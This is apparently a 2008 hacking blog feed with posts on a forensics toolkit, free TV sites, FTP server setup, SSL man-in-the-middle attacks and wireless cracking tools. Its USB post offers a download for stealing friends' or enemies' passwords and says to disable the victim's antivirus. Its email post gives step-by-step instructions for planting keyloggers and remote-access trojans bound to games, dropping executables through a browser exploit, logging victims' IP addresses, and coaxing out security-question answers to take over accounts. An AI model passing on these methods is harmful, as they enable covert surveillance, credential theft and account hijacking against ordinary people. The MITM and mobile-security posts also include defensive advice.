Sophisticated Downloads and Tricks .

FBI Forensic Field Kit

noreply@blogger.com (saien) — Sun, 02 Mar 2008 15:45:00 +0000

FBI Forensic Field Kit....

FBI Forensic Field Kit - Bootable

This is the ultimate bootable Disk for the agent, (or wannabe agent).

Forensics Tools:
Sleuth Kit -Forensics Kit
Py-Flag - Forensics Browser
Autopsy - Forensics Browser for Sleuth Kit
dcfldd - DD Imaging Tool command line tool and also works with AIR
foremost - Data Carver command line tool
Air - Forensics Imaging GUI
md5deep - MD5 Hashing Program
netcat - Command Line
cryptcat - Command Line
NTFS-Tools
qtparted - GUI Partitioning Tool
regviewer - Windows Registry Viewer
X-Ways WinTrace
X-Ways WinHex
X-Ways Forensics
R-Studio Emergency (Bootable Recovery media Maker)
R-Studio Network Edtion
R-Studio RS Agent
Net resident
Faces 3 Full (600 megs)
Encase 4.20

Field Kit Manuals

Incident response - Computer Forensics
Computer Crime investigation
Forensic Pathology
Internet Forensics
Forensic interpretation of Evidence
Windows Forensics
Computer Forensics -An Illustrated Dictionary
Computer Forensics - jumpstart

Additional programs on Boot DVD:

Gentoo Linux 2.6 Kernel - Opyimized for Forensics Use
XFCE - GUI
Apache2 - Server
Mysql PHP4
Open Office
Gimp - Graphics Program
KSnapshot - Screen Capture Program
Mozilla
Gnome CD Master
K3b - CD Burner
XMMS - media player
Porthole - Gentoo Graphics Package Manager
Karchiver - GZIp GUI

Security Tools:
Etherape - GUI Network Traffic Monitor
Clamv - Anti Virus
snort - Command Line
John the Ripper - Command Line password cracker
rkhunter - Command Line
Ethereal - Network Traffic Analyzer
FWBuilder - GUI Firewall App
nessus - network scanner

Download here FBI Tool Kit:

Hack a PC by USB..

noreply@blogger.com (saien) — Sun, 02 Mar 2008 15:34:00 +0000

Hacking passwords or any information using USB(pendrives).Here is the small tricks guys for stealing information or passwords of ur friends or enemies using pendrives...

Download this software:

http://www.mediafire.com/?f3ddzyenlug

Extract it.
open pcinfo
select all the files and paste it in ur USB(pendrive)
it in the pc u wanna hack...
Open the USB drive, give it 2 sec and and ur job is done...

And now open the dump folder in ur pc and u will have all the info u want....

Info u will obtain:

Ok now the problem which i was facing....

well i think it duznt autorun on PC with antivirus... U have to manually click the nircmd.exe

U have to disable his/her antivirus for auto running this program..

Whether Mail Hacking is possible?

noreply@blogger.com (saien) — Sun, 02 Mar 2008 15:10:00 +0000

Whether Mail Hacking is possible?

This topic is favourite of all newbies
EMAIL PASSWORD HACKING
First of all it is very difficult to crack any mail server
like yahoo,google,msn etc.
ANd even if you crack into their server it is not possible to decode the password
so just forget abt this method
We will try something different

If u have physical access(direct access) to someone's PC and u want to hack his account password then it is the best thing for us.U don't need anything better than that,all u hv to do is to download a good keylogger to ur pc and copy it in ur pendrive or cd
and install the keylogger in the victim's pc.That's it.

KEYLOGGER:-This are the program which records the every keystrokes on keyboard which means it will record all passwords also.The data will be stored on the victims computer only(they r stored in one file which is usually located in system folder) but as u hv physical access u can access this file easily
some keyloggers are hidden so the victim will not hv ne clue abt it and ur work will be done easily.click here to see how it works

Most of u will say that u don't hv direct access to the victim's pc.It is little difficult to get password if u don't hv direct access to victim's pc.
In this kinda situations u can use trojan's for this.There r many trojans available on internet.U can find many using google.If u want u can scrap in my orkut profile.http://www.orkut.com/Profile.aspx?uid=5276101150478462485

Well of course most of you out there will say that you don't have physical access to your target's computer. That's fine, there still are ways you can gain access into the desired email account without having to have any sort of physical access. For this we are going to go back onto the RAT topic, to explain methods that can be used to fool the user into running the server portion of the RAT (again, a RAT is a trojan) of your choice. Well first we will discuss the basic "send file" technique. This is simply convincing the user of the account you want to access to execute the server portion of your RAT.

To make this convincing, what you will want to do is bind the server.exe to another *.exe file in order to not raise any doubt when the program appears to do nothing when it is executed. For this you can use the tool like any exe file to bind it into another program (make it something like a small game)...

On a side note, make sure the RAT of your choice is a good choice. The program mentioned in the previous section would not be good in this case, since you do need physical access in order to set it up. You will have to find the program of your choice yourself (meaning please don't ask around for any, people consider that annoying behavior).

If you don't like any of those, I'm afraid you are going to have to go to www.google.com, and look for some yourself. Search for something like "optix pro download", or any specific trojan. If you look long enough, among all the virus notification/help pages, you should come across a site with a list of RATs for you to use (you are going to eventually have to learn how to navigate a search engine, you can't depend on handouts forever). Now back to the topic at hand, you will want to send this file to the specified user through an instant messaging service.

The reason why is that you need the ip address of the user in order to connect with the newly established server. Yahoo! Messenger, AOL Instant Messenger, it really doesn't matter. What you will do is send the file to the user. Now while this transfer is going on you will go to Start, then Run, type in "command", and press Enter. Once the msdos prompt is open, type in "netstat -n", and again, press enter. You will see a list of ip addresses from left to right. The address you will be looking for will be on the right, and the port it's established on will depend on the instant messaging service you are using. With MSN Messenger it will be remote port 6891, with AOL Instant Messenger it will be remote port 2153, with ICQ it will be remote port 1102, 2431, 2439, 2440, or 2476, and with Yahoo! Messenger it will be remote port 1614.

So once you spot the established connection with the file transfer remote port, then you will take note of the ip address associated with that port. So once the transfer is complete, and the user has executed the server portion of the RAT, then you can use the client portion to sniff out his/her password the next time he/she logs on to his/her account.

Don't think you can get him/her to accept a file from you? Can you at least get him/her to access a certain web page? Then maybe this next technique is something you should look into.

Currently Internet Explorer is quite vulnerable to an exploit that allows you to drop and execute .exe files via malicious scripting within an html document. For this what you will want to do is set up a web page, make sure to actually put something within this page so that the visitor doesn't get too entirely suspicious, and then imbed the below script into your web page so that the server portion of the RAT of your choice is dropped and executed onto the victim's computer...

While you are at it, you will also want to set up an ip logger on the web page so that you can grab the ip address of the user so that you can connect to the newly established server. Here is the source for a php ip logger you can use on your page...

http://www.planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=539&lngWId=8

Just insert this source into your page along with the exedrop script, and you are set. Just convince the user to go to this page, and wait till the next time they type in their email password. However, what do you do if you can not contact this user in any way to do any of the above tricks. Well, then you definately have your work cut out for you. It doesn't make the task impossible, but it makes it pretty damn close to it. For this we will want to try info cracking. Info cracking is the process of trying to gather enough information on the user to go through the "Forgot my Password" page, to gain access into the email account.

If you happen to know the user personally, then it helps out a lot. You would then be able to get through the birthday/ zipcode questions with ease, and with a little mental backtracking, or social engineering (talking) out the information from the user be able to get past the secret question. However, what do you do if you do not have this luxury? Well in this case you will have to do a little detective work to fish out the information you need.

First off, if a profile is available for the user, look at the profile to see if you can get any information from the profile. Many times users will put information into their profile, that may help you with cracking the account through the "Forgot my Password" page (where they live, their age, their birthday if you are lucky). If no information is provided then what you will want to do is get on an account that the user does not know about, and try to strike conversation with the user. Just talk to him/her for a little while, and inconspicuously get this information out of the user (inconspicuously as in don't act like you are trying to put together a census, just make casual talk with the user and every once in a while ask questions like "When is your birthday?" and "Where do you live?", and then respond with simple, casual answers).

Once you have enough information to get past the first page, fill those parts out, and go to the next page to find out what the secret question is. Once you have the secret question, you will want to keep making casual conversation with the user and SLOWLY build up to asking a question that would help you answer the secret question. Don't try to get all the information you need in one night or you will look suspicious. Patience is a virtue when info cracking. Just slowly build up to this question. For example, if the secret question is something like "What is my dog's name?", then you would keep talking with the user, and eventually ask him/her "So how many dogs do you have? ...Oh, that's nice. What are their names?". The user will most likely not even remember anything about his/her secret question, so will most likely not find such a question suspicious at all (as long as you keep it inconspicuous). So there you go, with a few choice words and a little given time, you have just gotten the user to tell you everything you need to know to break into his/her email account. The problem with this method is that once you go through the "Forgot my Password" page, the password will be changed, and the new password will be given to you. This will of course deny the original user access to his/her own account. But the point of this task is to get YOU access, so it really shouldn't matter. Anyways, that concludes it for this tutorial..

Online TV

noreply@blogger.com (saien) — Fri, 29 Feb 2008 17:09:00 +0000

Watch TV online here are some free online tv websites, they offer u with channels which u watch on tv & also the channels which u haven't seen them before..Here u can get all types of channels from education to entertainment, all types of movies & many more....The most important is u can watch cricket live matches if ur subscriber is unable to afford those channels..

* www.live-from-bd.com : The site called "Live from Bangladesh". The site has list of all the famous Indian channels that you can watch online. Zee TV, Sony TV, Star One, Star Plus, Zee Cinema etc. The site doesn't require you to register. All you need is Windows Media Player 10, Real Player, VLC Media Player installed on your machine. You must be aware of Windows Media Player and Real Player. You can get VLC media player free, just google it and you will find it. Once you go to the website, you will see list of channels on the left. Click on the channel you want to see and you would see the screen with username and password information. The popup box will ask you to enter that information and you should be all set. Watch Zee Cinema Online, Watch Zee TV online, Watch Sony TV Online and enjoy.

* www.idesitv.com: This site used to require registration but they have changed their layout and now its just simple page with list of channels URLs. Click on the channel and a popup window will open up. Same list of channels are available here. Less than what you get from the previous site. Few sites have voice issue. The voice and video moves in fast forward motion makes it sound funny. For e.g. Sony TV & Star One.

* www.djzaki.com: I don't believe this site has online channels but you can watch videos clippings from these Indian Channels. This site requires registration.

* www.nepalisite.com/tv : This site has only 5-6 channels but the quality is good and doesn't have annoying ads. It has Zee, Sony, Sony Max, Star Plus, Aaj Tak, IBN Live, Star One. I would rank this site as 2nd after live-from-bd.com. Watch Star Plus Online.

* www.onlinemedia.in: Beware of this website. It does provide all these channels but has lot of popup ads and could have spywares. I would go to this site as a last option.

* www.musicnmovies.com: Music 'n Movies is based on free media Meta-crawler, which searches on the media file hosting servers for free bollywood movies , indexes them and present them in well format on this portal.

* viewmy.tv :Check out a free new live internet tv service called http://viewmy.tv - an excellent website that allows you to watch internet TV from all over the world, they even let you create your own personal page and have tons of features, like search, countries, genres, multi-lingual descriptions, channel bitrate quality monitoring, rss feeds for blogs, full screen, mini screen options !! everyone's watching viewmy.tv.

* www.tvcells.org :Its another site to watch tv online

* World Wide Internet Television: Also known as, wwitv.com is a nice site with over 1000 listings of TV channels that you can use to watch TV online for free. While I haven't counted the languages or countries represented there seem to be quite a few ! This is a site I visit often when I want to watch something in Spanish, followed by something in Hindi. The site requires Real Player and is very easy to use and navigate.

* www.streambox.tv :StreamBox is a web-streaming portal that live-streams Indian TV channels through the internet. Just like how TV channels are telecasted through cable or dish, StreamBox telecasts Indian TV channels through the internet.

Here is the collection of some more sites:

Create An Ftp Server On Your Pc

noreply@blogger.com (saien) — Thu, 21 Feb 2008 14:56:00 +0000

How to create an FTP Server on your computer using Ser-u,their is a cool trick for changing ur pc into server.Hack yahoo password by making servers & hack any messengers passwords.

Process 1:
First of all u have to get an static IP-Address.
Need a a static ip-address for ur FTP Server.Necessity for getting this static ip-address is ur not suppose to use ur own IP-Address.The main reason is u dont want to show ur IP-Address to everyone , there are many other reasons too but leave them aside..

1.Goto no-ip & create urself a free account.

2.Now ur account been created & ll receive ur account password via mail to ur email address.

3.After getting ur password login to ur account of no-ip.com

4.After getting logged in, click upon add a HOST its on the left menu.

5.Type any hostname u want (eg:-saien) & select any domain from da given list (eg:-ftpserve.com) Click on Submit.

6.Now u have owned ur own static address (example: saien.serveftp.com)

7.Now click downloads button which is present above on the page & click on which operating system ur using & den download DNS update client or u can download it from here directly, this is for microsoft window users..

8.After getting downloaded, u have to install this software & login here with ur email addresss & p/w wen asked for it.

9.At last tick on da check box present at the static address.

10.U have ur own static web address.

Process 2:
Installation & setting of the FTP-Server

1.You have to install Serv-U 4.1.03 , download this software from here

2. Run Serv-U & use da wizard to setup ur FTP.

3.Click on next until u have been asked for IP-Address, leave it as it is & click upon next.

4.Enter ur domain name u have registered (example: rkchoolie.serveftp.com) it above in da domain field & click upon next.

5.U ll be asked for anonymous access, select No & click upon next.

6.Next u ll be asked for creating a named account, select yes & click upon next.

7.Choose any user name u wish (eg:-saien) & clcik upon next.

8.Enter password for dis account (eg:-@1254Rwn) for security purpose choose difficult password.

9.U ll be asked for da home directory for the account which u have created above.Select directory & click upon next.

10.Click on yes for locking dis account to da home directory, doing dis da user cannot further move up into home directory, click upon next.

11.At last ur account has been created click finish.

Process 3:
Configuring the user accounts which u have been created.

1.On the left tree-menu, select da account which u have been created above & den click upon General Tab.

2.Goto Hide 'Hidden' Files.

3. Check Allow only and enter the number one in the box.

4.Set da maximum downloading speed upto wat extent u want.As this is an account so many ll be using so set it low(eg:-10-20) to save ur bandwidth.Don't leave it blank as uers can download with full bandwidth.

5.choose how many users u want to login at on time.It depends on ur connection speed try these (56 - 1, ISDN - 3, ADSL or cable - 5-6 users.)

6.Click upon Dir Access Tab.

7.Now u can c home folder here.Highlight it & make ur permission.

8.If u want only users to download check only these Read,List & Inherit.

9.If u want ur users to upload into ur server & bu tto only 1 particular folder but not to downlaod, click upon dat add button & then select dat folder, Now u have to highlight dat folder & set these permissions on dat folder.Check,Write,Appened,List,Create & Inherit after setting these permissions click on the arrow which is present at the bottom right-hand corner.U want dis upload folder 2 be list first, before da home folder.

10.If der is any folder which u dont want anyone to access it, & it is present in the home folder, den click da add button & den select da folder.Now u have to highlight dat folder & see dat no all da checkboxes are left.After doing this click upon upper arrow which is present at bottom right hand corner.

11.There r many things u can do, These are only the basics....

12. Ur server is now ready to be connected..

13. Login with ur username & password...

Hacking Online Banking and Credit Card Transactions

noreply@blogger.com (saien) — Wed, 20 Feb 2008 16:19:00 +0000

Hacking Online Banking and Credit Card Transactions – And How to Prevent It:

Here is process for hacking online banking and credit cards transactions and also a process to prevent from them .

The Scenario

You go to a coffee shop for a cup of coffee and to utilize the shop’s Wi-Fi HotSpot to surf the web. You connect to the hotspot network and decide to perform some online banking or to purchase something online. By the way, this could happen to you at home, as well. As an end-user, you feel quite secure, as you see the lock in the bottom corner of your Internet browser, symbolizing that the online banking or online credit card transaction is safe from prying eyes. Your data, including username, password, credit card info, etc. will be encrypted with 128-bit encryption. So it's secure, right?

It is not uncommon to perform banking and to purchase products online with your credit card. It is also a common thought that doing so is secure, as this is done via SSL. For the most part, this is true and the sessions are secure. Discover Card, for example, posts the following statement on their website:

Figure 1

The problem is that it is not “virtually impossible” for someone else to see your data, such as login information or credit card numbers. It can actually be relatively easy, as you’ll see, if you as an end-user are not knowledgeable about how you can be exploited and know the signs that this is occurring.

Figure 2 (Indicates a Secure SSL Session)

Continuing with the scenario, what you didn’t realize is that a hacker has intercepted your Online Banking login credentials and credit card information and can now log into your Online Banking Website or purchase items with your credit card. How is this possible, since SSL was used and is hard to break? The answer is that you made a fatal mistake that subjected you to an SSL Man-in-the-Middle (MITM) attack.

The Attack

The fatal flaw that enabled the sensitive information to be stolen is possible when an end-user is not properly educated on an easy to do and well-known SSL exploit – SSL MITM.

Here’s how it’s done:

The hacker goes to coffee shop and connects to the same Wi-Fi network you are connected to. He runs a series of utilities to redirect other user’s data through his machine. He runs a number of other utilities to sniff the data, act as an SSL Certificate Server and to be the Man-the-Middle. The following diagram shows a very simplified graphic of how your SSL Banking session should work under normal conditions, then how it would work during an attack:

Figure 3

Figure 4

An important concept to grasp here is that a certificate is used to establish the secure SSL connection. This is a good thing, if you have a good certificate and are connecting directly to the website to which you intended to use. Then all your data is encrypted from your browser to the SSL website where the bank’s website will use the information from the certificate it gave you to decrypt your data/credentials. If that is truly the case, then it is pretty darn hard for a hacker to decrypt the data/credentials being transmitted, even if he is able to sniff your data.

This is a bad thing if you have a “Fake” certificate being sent from the hacker, and you are actually connecting to his machine, not directly to the bank’s website. In this case, your credentials are being transmitted between your browser and the hacker’s machine. The hacker is able to grab that traffic, and, because he gave you the certificate to encrypt the data/credentials, he can use that same certificate to decrypt your data/credentials.

Here are the exact steps a hacker could use to perform this attack:

The first thing he would do is turn on Fragrouter, so that his machine can perform IP forwarding

Figure 5

After that, he’ll want to direct your Wi-Fi network traffic to his machine instead of your data traffic going directly to the Internet. This enables him to be the “Man-in-the-Middle” between your machine and the Internet. Using Arpspoof, a real easy way to do this, he determines your IP address is 192.168.1.15 and the Default Gateway of the Wi-Fi network is 192.168.1.1:

Figure 6

The next step is to enable DNS Spoofing via DNSSpoof:

Figure 7

Since he will be replacing the Bank's or Online Store’s valid certificate with his own fake one, he will need to turn on the utility to enable his system to be the Man-in-the-Middle for web sessions and to handle certificates. This is done via webmitm:

Figure 8

At this point, he is setup and ready to go, he now needs to begin actively sniffing your data passing through his machine including your login information and credit card info. He opts to do this with Ethereal, then saves his capture:

Figure 9

He now has the data, but it is still encrypted with 128-bit SSL. No problem, since he has the key. What he simply needs to do now is decrypt the data using the certificate that he gave you. He does this with SSL Dump:

Figure 10

The data is now decrypted and he runs a Cat command to view the now decrypted SSL information. Note that the username is “Bankusername” and the password is “BankPassword”. Conveniently, this dump also shows that the Banking site as National City. FYI, the better, more secure banking and online store websites will have you first connect to another, preceeding page via SSL, prior to connecting to the page where you enter the sensitive information such as bank login credentials or credit card numbers. The reason for this is to stop the MITM-type attack. How this helps is that if you were to access this preceeding page first with a "fake" certificate and then proceeded to the next page where you were to enter the sensitve information, that page where you would enter the sensitive information would not display. That is because the page gathering the sensitive information would be expecting a valid certificate, which it would not receive because of the Man-in-the-Middle. While some online banks and stores do implement this extra step/page for security reasons, the real flaw in this attack is the uneducated end-user, as you'll soon see:

Figure 11

With this information, he can now log into your Online Banking Account with the same access and privileges as you. He could transfer money, view account data, etc.

Below is an example of a sniffed SSL credit card purchase/transaction. You can see that Elvis Presley was attempting to make a purchase with his credit card 5440123412341234 with an expiration date of 5/06 and the billing address of Graceland in Memphis, TN (He is alive!). If this was your information, the hacker could easily make online purchases with your card.

Figure 12

Also Real Bad News for SSL VPN Admins

This type of attack could be particularly bad for corporations. The reason for this is that Corporate SSL VPN solutions are also vulnerable to this type of attack. Corporate SSL VPN solutions will often authenticate against Active Directory, the NT Domain, LDAP or some other centralized credentials data store. Sniffing the SSL VPN login then gives an attacker valid credentials to the corporate network and other systems.

What an End-User Needs To Know

There’s a big step and end-user can take to prevent this from taking place. When the MITM Hacker uses the “bad” certificate instead of the “good”, valid certificate, the end-user is actually alerted to this. The problem is that most end-users don’t understand what this means and will unknowingly agree to use the fake certificate. Below is an example of the Security Alert an end-user would receive. Most uneducated end-users would simply click “Yes”… and this is the fatal flaw:

Figure 13

By clicking “Yes”, they have set themselves up to be hacked. By clicking the “View Certificate” button, the end-user would easily see that there is a problem. Below are examples of the various certificate views/tabs that show a good certificate compared to the bad certificate:

Figure 14
(Good Certificate) (Bad Certificate)

Figure 15
(Good Certificate) (Bad Certificate)

Figure 16
(Good Certificate) (Bad Certificate)

How an End-User Can Prevent This

Again, the simple act of viewing the certificate and clicking “No” would have prevented this from happening.
Education is the key for an end-user. If you see this message, take the time to view the certificate. As you can see from the examples above, you can tell when something doesn’t look right. If you can’t tell, err on the side of caution and call your Online Bank or the Online store.
Take the time to read and understand all security messages you receive. Don’t just randomly click yes out of convenience.

How a Corporation Can Prevent This

Educate the end-user on the Security Alert and how to react to it.
Utilize One Time Passwords, such as RSA Tokens, to prevent the reuse of sniffed credentials.
When using SSL VPN, utilize mature products with advanced features, such as Juniper’s Secure Application Manager or Network Connect functionality.

Conclusion

This type of attack is relatively easy to do in a public Wi-Fi hotspot environment. It could also easily happen on a home Wi-Fi network, if that Wi-Fi network isn’t properly configured and allows a hacker to connect to that home network (See Essential Wireless Hacking Tools for more info on securing your home network). An educated end-user and sound security practices by corporations can protect your valuable data.

The credit goes to the Ethical Hackers.

Step-By-Step Hacking Video

noreply@blogger.com (saien) — Wed, 20 Feb 2008 16:15:00 +0000

Hacking:Everyone talks about the ability to hack computers via wireless technology, but have you ever actually SEEN someone do it? Well you're about to. The Step-By-Step Hacking Video will show exactly how a laptop without the proper security protection can be attacked and exploited. In a manner of mere minutes, we can own an unprotected or out-of-date system. The video actually shows the exact procedures that a hacker could utilize to gain access to a mobile system and eventually a corporate network. Steps and technologies to prevent such an attack are presented throughout the video and are the focus of this article. NOTE: While it may seem that the first few minutes of the video are unexciting – just wait – you are being setup!

This article is broken up into two sections. The first section quantifies the different threats to which mobile computer systems are susceptible. The second portion defines the fundamental methodological steps that hackers take in trying to exploit computer systems directly and details how each step could be thwarted. These fundamental steps are also used in the video.

Today’s mobile workforce poses significant security challenges to corporations. With workers accessing corporate resources from public wi-fi hotspots, hotels, home wi-fi and broadband networks, etc., the need for a comprehensive mobile workforce security solution is becoming a necessity. This is an extraordinary challenge considering the additional complexity of the mobile workforce being a moving target and with security budgets and personnel constantly being downsized.

To implement an ideal mobile workforce solution, it is important to understand the actual threats. These threats fall into three main categories:

Malware

Most consumers think of viruses when it comes to malware and believe that an antivirus software solution will address all malware threats. Those of us in the industry realize that it is much more complex. For antivirus solutions to be effective, they need to be running and the virus definitions need to be up-to-date. This can be a significant challenge with a mobile workforce that is not always online when automatic updates are performed. To protect yourself from malware, please consider the following:

In addition to antivirus software, antispyware applications are necessary to address the malware threat. Keeping these applications running and up-to-date poses the same difficulty as antivirus updates.

Another important tool to combat malware is an enterprise-grade personal firewall with IDS/IPS capability. This is important because antivirus and antispyware applications are reactive and based upon recent definition files. Conversely, an enterprise-grade personal firewall with IDS/IPS capability has the ability of performing zero day protection, where malicious behavior can be intelligently identified and stopped as it occurs.
An often-overlooked means to prevent the risk from malware is ensuring that the remote endpoints have the latest operating system and application security patches and that the remote system is properly configured from a security perspective. This is important because malware will often take advantage of system and application vulnerabilities that would not be present if the system were up-to-date with patches and properly configured.
It is also important to note that there is a significant risk that anti-antivirus and anti-personal firewall malware will disable the security applications that corporations put into place. Consequently, it is important to have a check take place to ensure that these applications are running and up-to-date and if they are not, access to the Internet, corporate network, etc. should be denied and the deficiency remediated. The logic for such checking and remediation should reside on the remote endpoint, as today’s systems need to be in compliance with security policies at all times. In the past, corporations have relied upon VPN Concentrators or Cisco NAC-type functionality to check the security posture of the remote endpoint as it is gaining access to the corporate network. With today’s mobile workers spending 80% of their time not VPN’d into a corporate network, this way of checking the state of the system’s security posture is inadequate.

Sniffing

A mobile worker constantly has the threat of their data being sniffed. Sniffing can fall into two fundamental categories:

Sniffing of Credentials – Corporations are moving to a model where a single application is being used to provide dial-in, wi-fi, broadband, mobile data (CDMA, EVDO,), etc. access. In doing so, there is an advantage to having authentication for all of these different transports proxied back to a central location, commonly the corporation's network. Often, these authentication credentials are the remote user’s network credentials, or some other credentials that have significant value to the end-user and corporation. Consequently, it is very important to ensure that these credentials are protected during the proxy process. With standard RFC Compliant RADIUS Proxy (A commonly used authentication protocol), the username is always sent in the clear and the password is hashed with MD5, then un-hashed and re-hashed on each RADIUS server through which the credentials pass.

Sniffing of Data – With workers using public and private wi-fi and hotel broadband Internet access, the threat of an unwanted party sniffing application traffic is a very real concern. In virtually all cases, public wi-fi locations and hotel broadband locations do not offer any forms of inherent encryption for data leaving a system on these networks, while at the same time making these networks readily available to a number of simultaneous users. The best way to protect against the sniffing of data is to ensure that a VPN tunnel is active throughout the life of the public wi-fi and hotel broadband network connection. Doing this and disabling split-tunneling will ensure that all data leaving the remote system will be encrypted via the VPN client, which commonly would use DES, 3DES or AES encryption.

Direct Attack

The most dangerous form of attack is a direct attack. This is because a hacker can use their cognitive skills to exploit a remote system and to leave the remote system vulnerable in the future. They can also consciously dissect and analyze data on the remote system. There are a number of key security steps to implement to protect against a direct attack:

Remote systems need to be up-to-date with security patches and properly configured. Hackers gain direct access to remote endpoints by running exploits that take advantage of vulnerabilities on the remote system that would not be present if the system were properly patched and properly configured. Ensuring a mobile workforce has the latest patches and is properly configured is one of the biggest security challenges to organizations. Virtually all of the patching systems in place today do not provide a means to remediate the remote system by actually pushing the necessary patch or configuration to the system when the endpoint is not connected directly to or VPN’d into the corporate network. With end-users spending 80% of their online time not VPN’d into the corporate network, that leaves a significant gap.
Ensuring the remote endpoint has an enterprise-grade personal firewall that is running, properly configured and up-to-date. This firewall would not only prohibit a hacker from accessing the remote systems, it would also provide stealth capabilities to help make the endpoint invisible to scans.
Being purposely redundant, antivirus and antispyware applications need to be running and up-to-date. An outdated security application will not provide protection against newly developed malware. Commonly, a hacker will place malware on a victim’s machine to either further exploit it, or to provide a means to exploit it in the future. An endpoint that is constantly scanning for the existence of such malware will be able to detect when this takes place and perform the necessary actions to address the threat.

Step-by-Step Guide to the Fundamental Steps Performed in the Video and How to Combat Them

Footprinting and Scanning

The first step is finding a live system. There are many tools available on the Internet to search for live targets. To protect against footprinting and scanning, use an enterprise-grade, properly configured and running personal firewall. This is the best means to protect your mobile systems from even being seen during a scan.

Enumeration

Once a target is found, more information needs to be gathered to determine the best approach for exploiting it. Just as there are many scanning tools available free on the Internet, there are many enumeration tools available. There are two main steps that should be implemented to prevent enumeration from taking place:

Ensuring that a properly configured enterprise-grade firewall is present and operational.
Ensuring that the remote operating system is properly configured, so that it does not disclose this type of information.

Launching an Attack

Once a live system is found and information is gathered about it, a direct attack can be launched against the system. There are a number of steps that can be taken to prevent a direct attack:

Ensuring your remote systems have the latest operating system and application security patches. When hackers launch an attack against a system they do so using exploits that take advantage of vulnerabilities on the remote system that commonly would not be present if the remote systems was up-to-date with security patches.
Ensuring that a properly configured enterprise-grade firewall is present and operational.
Ensuring that antivirus and antiSpyware are running, utilizing real-time scanning and are up-to-date on your remote systems. It is a common tactic for hackers to place trojans and other malware on hacked systems and having these programs actively scanning would help catch situations where this malware is being transferred to the hacked machine.

Leaving the Remote System Vulnerable to an Attack

Once a hacker has exploited the system, they will commonly take steps to leave it vulnerable to future attacks. This can be done by installing a trojan or remote control software, installing a key logger that routinely sends all keystrokes from the system, etc. To protect against this step:

Ensuring an enterprise-grade personal firewall is running, properly configured and up-to-date. This can stop a remote connection from taking place and sense when malicious activities are taking place.
Ensuring that antiSpyware and antivirus applications are running, and up-to-date. In doing so, these security applications would be able to find address and malware left behind to further exploit the system.

I hope this helps shed light on the hacking process and has given you ample information to help you protect your own corporate networks including those ever slippery mobile workforce machines.

The credit goes to the Ethical Hackers.

Essential Wireless Hacking Tools

noreply@blogger.com (saien) — Wed, 20 Feb 2008 15:54:00 +0000

Essential Wireless Hacking Tools,& the most important wireless hacing tools ,here are the most essential tools for wireless hacking ,guys interested in gaining a deeper knowledge of wireless security and exploiting vulnerabilities will need a good set of base tools with which to work. Fortunately, there are an abundance of free tools available on the Internet. This list is not meant to be comprehensive in nature but rather to provide some general guidance on recommended tools to build your toolkit.

Finding Wireless Networks:
Locating a wireless network is the first step in trying to exploit it. There are two tools that are commonly used in this regard:
Network Stumbler a.k.a NetStumbler – This Windows based tool easily finds wireless signals being broadcast within range – A must have. It also has ability to determine Signal/Noise info that can be used for site surveys. I actually know of one highly known public wireless hotspot provider that uses this utility for their site surveys.

(NetStumbler Screenshot)

Kismet – One of the key functional elements missing from NetStumbler is the ability to display Wireless Networks that are not broadcasting their SSID. As a potential wireless security expert, you should realize that Access Points are routinely broadcasting this info; it just isn’t being read/deciphered. Kismet will detect and display SSIDs that are not being broadcast which is very critical in finding wireless networks.

(Kismet Screenshot)

Attaching to the Found Wireless Network:Once you’ve found a wireless network, the next step is to try to connect to it. If the network isn’t using any type of authentication or encryption security, you can simply connect to the SSID. If the SSID isn’t being broadcast, you can create a profile with the name of the SSID that is not being broadcast. Of course you found the non-broadcast SSID with Kismet, right? If the wireless network is using authentication and/or encryption, you may need one of the following tools.

Airsnort – This is a very easy to use tool that can be used to sniff and crack WEP keys. While many people bash the use of WEP, it is certainly better than using nothing at all. Something you’ll find in using this tool is that it takes a lot of sniffed packets to crack the WEP key. There are additional tools and strategies that can be used to force the generation of traffic on the wireless network to shorten the amount of time needed to crack the key, but this feature is not included in Airsnort.

(Screenshot of Airsnort in Action)

CowPatty – This tool is used as a brute force tool for cracking WPA-PSK, considered the “New WEP” for home Wireless Security. This program simply tries a bunch of different options from a dictionary file to see if one ends up matching what is defined as the Pre-Shared Key.

(Cowpatty Options Screenshot)

ASLeap – If a network is using LEAP, this tool can be used to gather the authentication data that is being passed across the network, and these sniffed credentials can be cracked. LEAP doesn’t protect the authentication like other “real” EAP types, which is the main reason why LEAP can be broken.

(Asleap Options Screenshot)

Sniffing Wireless Data:

Whether you are directly connected to a wireless network or not, if there is wireless network in range, there is data flying through the air at any given moment. You will need a tool to be able to see this data.

Wireshark (formerly Ethereal) – While there has been much debate on the proper way to pronounce this utility, there is no question that it is an extremely valuable tool. Ethereal can scan wireless and Ethernet data and comes with some robust filtering capabilities. It can also be used to sniff-out 802.11 management beacons and probes and subsequently could be used as a tool to sniff-out non-broadcast SSIDs.

(Screenshot of Ethereal in Action)

(Yahoo IM Session being sniffed in Ethereal)

The aforementioned utilities, or similar ones, will be necessities in your own wireless security toolkit. The easiest way to become familiar with these tools is to simply use them in a controlled lab environment. And cost is no excuse as all of these tools are available freely on the Internet.

Protecting Against These Tools:

Just as it’s important to know how to utilize the aforementioned tools, it is important to know best practices on how to secure your Wireless Network Against these tools.

NetStumbler – Do not broadcast your SSID. Ensure your WLAN is protected by using advanced Authentication and Encryption.

Kismet – There’s really nothing you can do to stop Kismet from finding your WLAN, so ensure your WLAN is protected by using advanced Authentication and Encryption

Airsnort – Use a 128-bit, not a 40-bit WEP encryption key. This would take longer to crack. If your equipment supports it, use WPA or WPA2 instead of WEP (may require firmware or software update).

Cowpatty – Use a long and complex WPA Pre-Shared Key. This type of key would have less of a chance of residing in a dictionary file that would be used to try and guess your key and/or would take longer. If in a corporate scenario, don’t use WPA with Pre-Shared Key, use a good EAP type to protect the authentication and limit the amount of incorrect guesses that would take place before the account is locked-out. If using certificate-like functionality, it could also validate the remote system trying to gain access to the WLAN and not allow a rogue system access.

ASLeap – Use long and complex credentials, or better yet, switch to EAP-FAST or a different EAP type.

Ethereal – Use encryption, so that anything sniffed would be difficult or nearly impossible to break. WPA2, which uses AES, is essentially unrealistic to break by a normal hacker. Even WEP will encrypt the data. When in a Public Wireless Hotspot (which generally do not offer encryption), use application layer encryption, like Simplite to encrypt your IM sessions, or use SSL. For corporate users, use IPSec VPN with split-tunneling disabled. This will force all traffic leaving the machine through an encrypted tunnel that would be encrypted with DES, 3DES or AES.

The credit goes to the Ethical Hackers.

Wireless -Hotspot Hacks

noreply@blogger.com (saien) — Wed, 20 Feb 2008 09:18:00 +0000

